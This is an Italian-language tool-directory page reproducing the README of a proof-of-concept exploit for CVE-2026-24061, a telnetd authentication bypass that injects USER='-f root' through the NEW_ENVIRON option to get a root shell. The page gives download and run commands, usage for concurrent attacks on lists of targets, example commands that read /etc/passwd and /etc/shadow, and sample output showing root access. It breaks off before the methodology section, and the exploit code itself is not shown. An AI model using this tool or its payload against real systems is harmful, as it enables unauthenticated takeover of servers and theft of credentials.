Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/sh4den/cve-2026-24061
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingCommand and ControlAutenticazionePaper e RicercaApprendimento e FormazioneStrumento di Accesso Remoto
GitHubsh4den/cve-2026-24061

CVE-2026-24061

Vedi Repository
61112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Prova di concetto: CVE-2026-24061 è una vulnerabilità critica di bypass dell'autenticazione in GNU inetutils-telnetd che consente a remoti aggressori non autenticati di ottenere immediatamente l'accesso a una shell di root tramite lo sfruttamento dannoso dell'opzione telnet NEW_ENVIRON.

Condividi

CVE-2026-24061

GNU inetutils-telnetd - Bypass dell'autenticazione remota

Uno strumento di ricerca sulla sicurezza per lo sfruttamento di CVE-2026-24061, una vulnerabilità critica di bypass dell'autenticazione remota in GNU inetutils-telnetd che consente l'accesso immediato a una shell di root senza autenticazione.


Table of Contents

  • Riepilogo della vulnerabilità
  • Versioni interessate
  • Analisi tecnica
  • Prerequisiti
  • Installazione
  • Utilizzo
  • Riferimento dell'output
  • Metodologia di sfruttamento
  • Mitigazione e rimedio
  • Indicatori di compromissione
  • Disclaimer legale
  • Riferimenti
  • Crediti

Riepilogo della vulnerabilità

CampoValore
Identificatore CVECVE-2026-24061
Punteggio CVSS v3.19.8 (Critico)
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Classificazione CWECWE-88: Neutralizzazione impropria dei delimitatori di argomenti in un comando
FornitoreGNU Project
Prodottoinetutils-telnetd
Data di divulgazione20 gennaio 2026
Patch disponibileDa determinare (TBD)

Riepilogo esecutivo

Esiste una vulnerabilità critica in GNU inetutils-telnetd fino alla versione 2.7 che consente a utenti remoti non autenticati di bypassare completamente l'autenticazione e ottenere immediato accesso a una shell di root. La vulnerabilità viene sfruttata tramite l'opzione telnet NEW_ENVIRON iniettando una variabile d'ambiente USER appositamente predisposta con il valore "-f root", che aggira tutti i meccanismi di autenticazione.

Valutazione dell'impatto

  • Riservatezza: Compromissione completa dei dati di sistema
  • Integrità: Controllo totale del sistema con privilegi di root
  • Disponibilità: Possibile acquisizione completa del sistema o denial of service
  • Scope: Invariato - lo sfruttamento interessa solo il servizio telnet vulnerabile

Versioni interessate

Intervallo di versioniStato
<= 2.7Vulnerabile
> 2.7Stato della patch da determinare

Analisi tecnica

Causa principale della vulnerabilità

La vulnerabilità ha origine dalla convalida impropria della variabile d'ambiente USER nel gestore dell'opzione NEW_ENVIRON di telnetd. Durante l'elaborazione dell'opzione telnet NEW_ENVIRON, il servizio telnetd non riesce a sanificare il valore della variabile USER prima di passarlo al processo di login. Impostando USER su "-f root", l'attaccante inietta argomenti da riga di comando che forzano il successo dell'autenticazione per l'utente root senza richiedere credenziali.

Vettore d'attacco

  1. L'attaccante si connette al servizio telnetd (tipicamente porta 23)
  2. Durante la negoziazione delle opzioni telnet, il server richiede i dati NEW_ENVIRON
  3. L'attaccante risponde con la variabile d'ambiente USER impostata su "-f root"
  4. L'argomento dannoso aggira i controlli di autenticazione
  5. Viene concessa immediatamente una shell di root senza alcuna richiesta di password
  6. Si ottiene la compromissione completa del sistema

Complessità dello sfruttamento

  • Prerequisiti: Accesso di rete al servizio telnetd di destinazione
  • Autenticazione: Non richiesta
  • Interazione dell'utente: Nessuna
  • Complessità dell'attacco: Bassa

Prerequisiti

Requisiti di sistema

  • Python 3.7 o superiore
  • Connettività di rete verso le istanze telnetd di destinazione
  • Permessi sufficienti per eseguire script Python

Dipendenze

Tutte le dipendenze fanno parte della libreria standard di Python:

PacchettoScopo
socketComunicazione di rete
selectMultiplexing I/O
sysInterazione con il sistema
osInterfaccia del sistema operativo
threadingSfruttamento concorrente dei target
datetimeFormattazione dei timestamp

Installazione

Metodo 1: Tramite Git

# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>

Metodo 2: Download diretto

# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>

Metodo 3: Installazione manuale

# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>

Utilizzo

Interfaccia a riga di comando

Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          Single target IP address or hostname
    -l          Path to file containing target IPs (one per line)
    -p          Target port (default: 23)
    -usr        User to exploit as (default: root)

Sfruttamento di un singolo target

Sfrutta una singola istanza telnetd:

# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin

Modalità di esecuzione dei comandi

Esegui comandi in modalità non interattiva:

# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Sfruttamento di più target

Sfrutta più target da un file:

python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

Formato del file dei target (targets.txt):

192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Note:

  • Un target per riga
  • Indirizzi IP o nomi host
  • Le righe vuote vengono ignorate
  • I target vengono sfruttati contemporaneamente tramite threading

Riferimento dell'output

Indicatori di stato

IndicatoreColoreDescrizione
[SUCCESS]VerdeConnessione al target riuscita
[EXPLOIT]VerdePayload di sfruttamento inviato correttamente
[INFO]BluMessaggio informativo sull'operazione corrente
[ERROR]RossoErrore di connessione, timeout o errore di sfruttamento
[WARNING]GialloMessaggio di avviso (attualmente non utilizzato)

Output di esempio

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Metodologia di sfruttamento

Processo di negoziazione del protocollo telnet

Lo strumento sfrutta la fase di negoziazione del protocollo telnet:

Scarica lo strumento